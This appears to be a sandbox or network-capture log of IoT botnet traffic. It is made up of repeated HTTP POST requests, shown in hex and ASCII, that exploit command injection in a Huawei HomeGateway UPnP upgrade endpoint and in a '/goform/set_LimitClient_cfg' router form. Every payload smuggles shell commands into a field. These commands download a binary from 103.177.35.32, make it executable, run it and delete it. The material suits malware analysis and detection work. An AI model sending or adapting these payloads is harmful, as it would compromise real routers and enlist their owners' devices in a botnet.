                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
